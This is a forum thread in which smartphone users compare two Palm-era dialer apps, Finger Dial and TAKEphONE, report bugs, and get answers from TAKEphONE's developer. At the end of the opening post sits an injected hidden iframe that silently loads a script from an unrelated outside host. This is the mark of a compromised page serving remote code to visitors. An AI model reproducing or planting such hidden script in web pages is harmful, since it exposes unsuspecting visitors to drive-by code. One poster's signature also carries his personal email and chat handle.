+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
    I-300 Novice

Finger Dial Vs. Takephone Comments

In an effort to allow everyone to voice their opinions on what seem to have evolved as the two programs that fill the essential need of a phone number search engine for those of us with large address books, it would be great if everyone would contribute their comments on this thread as to how they have compared the two programs and which one they feel is best for them and why.

Thanks for your input.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

I would be curious to hear this from 7135 owners as well as other device owners.

One of the main features I like about TakePhone is the included hack which copies a highlighted number out of another app, and then transfers it automatically to TakePhone for dialing by pressing the Address Book button.

Originally posted by aegrant00
    I would be curious to hear this from 7135 owners as well as other device owners.
    Tried both!

Liked FingerClick initially, but then after seeing all the hoopla about TakePhone, tried it and am still on Shimons beta e-mail list.

FingerClick is exactly what I need. A way to quickly find a phone number and dial it IN THE CAR while driving. I think the buttons are big and easy to hit. I know Steve is working on the ability to use the keypad also. Works fine for me, but I only have 500 or so contact. I know some have stated that with 3000 contacts it was slow.

TakePhone I found less appealing to the eyes, the buttons were smaller and I could never find a way to exit the program without using the stylus. I still install the betas that Shimon sends over and give them a quick once over to see what enhancements are made.

My 2 cents!

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Originally posted by Rambler
    One of the main features I like about TakePhone is the included hack which copies a highlighted number out of another app, and then transfers it automatically to TakePhone for dialing by pressing the Address Book button.
    You dont need a hack to do this the 7135 does it alreaydy, i foud that last week, in any application just hightlight the phone number you wish to dial and press the send button of the phone. It will dial the number

TAKEphONE any day

I trialed both products extensively. There's no comparison. TAKEphONE is a MUCH better product. Shimone, the programmer, is the most responsive programmer I have ever met. You send him an e-mail with a question or problem and you have an answer or new version of the program before you know it.

Originally posted by prospects
    You dont need a hack to do this the 7135 does it alreaydy, i foud that last week, in any application just hightlight the phone number you wish to dial and press the send button of the phone. It will dial the number
    Well, that's very cool! The 6035 doesn't have this feature.

Registered User All-Purpose Guru's Avatar

6035 cut'n'paste

The 6035 does the cut 'n' paste trick as well. Highlight the phone number, press the phone icon next to the Graffiti area, and press 'send'.

Re: 6035 cut'n'paste

Originally posted by All-Purpose Guru
    The 6035 does the cut 'n' paste trick as well. Highlight the phone number, press the phone icon next to the Graffiti area, and press 'send'.
    I tried this in Eurdora Mail, while reading an e-mail with a phone # - it doesn't work. Maybe in some other apps though, but I've only tried Eudora Mail so far.

I noticed today that there is an apparent bug in the new TakePhone version that has to do with two different people in the address book having the same phone number. As an example Bill Jones and Mary Smith both at ABC Company have their own seperate entries in the address book but the same phone number. What happened was I called up Bill Jones name using Takephone and the keypad and made the call, however when the call actually went through it showed Mary Smith's name on the screen and in the recent call records. Can't tell you why it happens but if you is use the standard address book to make the call (i.e tap the number in the address book along side the name) then Mary's name shows up when you call Mary and Bill's name shows up when you call Bill. Go figure?

Also I can seem to find any logic in how the default, highlighted number shows up in Takephone. Any clues?

I like the program a lot though. Easy to use. and I really like not having to touch the screen. Speaking of which, anybody know if there is a keypad way of bringing up the Speed Dials in Takephone?

TAKEphONE !!!! nuf said.

Originally posted by Kevinw
    I noticed today that there is an apparent bug in the new TakePhone version that has to do with two different people in the address book having the same phone number. As an example Bill Jones and Mary Smith both at ABC Company have their own seperate entries in the address book but the same phone number. What happened was I called up Bill Jones name using Takephone and the keypad and made the call, however when the call actually went through it showed Mary Smith's name on the screen and in the recent call records. Can't tell you why it happens but if you is use the standard address book to make the call (i.e tap the number in the address book along side the name) then Mary's name shows up when you call Mary and Bill's name shows up when you call Bill. Go figure?

Also I can seem to find any logic in how the default, highlighted number shows up in Takephone. Any clues?

I like the program a lot though. Easy to use. and I really like not having to touch the screen. Speaking of which, anybody know if there is a keypad way of bringing up the Speed Dials in Takephone?
    Hi all,

1. The s/w interface supplied by Kyocera (the SDK) allows for the phone number only to be xfered for dialing. I guess what the dialer does is match the number with the address-book, finding the first match...
    This may be solved in the future, when I plan to use the other s/w interface supplied by Kyocera - the Palm OS telephony interface.

2. By "default, highlighted number" I guess you mean in the "Details" screen ? Well - it is the phone number set as the default phone field for that contact.

3. In the main screen, press the POUND (#) button to goto speed dial, there you can either use the Up/Down scroller, or press the desired entry number. To call Voice-Mail from the main screen - press and hold the "1" button.

Thank you all for your comments,
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Originally posted by TAKEphONE
    I guess what the dialer does is match the number with the address-book, finding the first match...
    Yep - I noticed the same thing happening with incoming calls and that has nothing to do with TAKEphONE.

Until you get the SDK for SMS, can you call the Messages or Eudora Mail apps and paste in the address or phone number into the "To" fields?

Originally posted by Beryl
    Yep - I noticed the same thing happening with incoming calls and that has nothing to do with TAKEphONE.

Until you get the SDK for SMS, can you call the Messages or Eudora Mail apps and paste in the address or phone number into the "To" fields?
    That's exactly what I want to do, but found no way of doing it.
    Do you think it would be enough if I put the phone/address in the clipboard ?
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Originally posted by TAKEphONE
    Hi all,

.......3. In the main screen, press the POUND (#) button to goto speed dial, there you can either use the Up/Down scroller, or press the desired entry number. To call Voice-Mail from the main screen - press and hold the "1" button.
    Shimon, I tried this and the # brings up the menu as you said, and you can direct key the desired number but I could not use the up/down scroller. FYI...

After coming from the Treo 300. I was spoiled by quick, easy lookup and dialing. What a drawback with the 7135...I'm back to finding 3rd party apps to do it. After reading this thread, I downloaded and tried both.

Finger Dial is better. You can at least look up a number and dial with one hand while in the car. You can't (IMO) do that with Takephone. I do like Takephone's interface a little better, but you can't dial without going through too many layers with too little of icons.
    Kevin R.

@Kevin - if you like FD, cool. However, you can dial w/one hand (no icons) w/TP. You use the OK button & not the green Phone button. That is by design, as I understand. The Phone buttons are left alone per user request. Not trying to get you to switch though. I hope both authors compete & improve their products!

Hi Beryl,

Maybe I don't have something configured correctly in TP. When I highlight a phone #, the OK button does not seem to do anything. The only way I can dial the number is by clicking on the phone icon. I'll take another look though. I agree with you though, I hope both improve for the 7135 as well as others. The up down and OK buttons do not seem to be fully supported in other apps.

Thanks for your reply,
    Kevin R.

Kev

What version of TakePhone are you using? His current beta is at 5.04v.

Jeff

edited to update beta version #
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I'm on version 4.64f. Is the beta publicly available?

Thanks,
    Kevin R.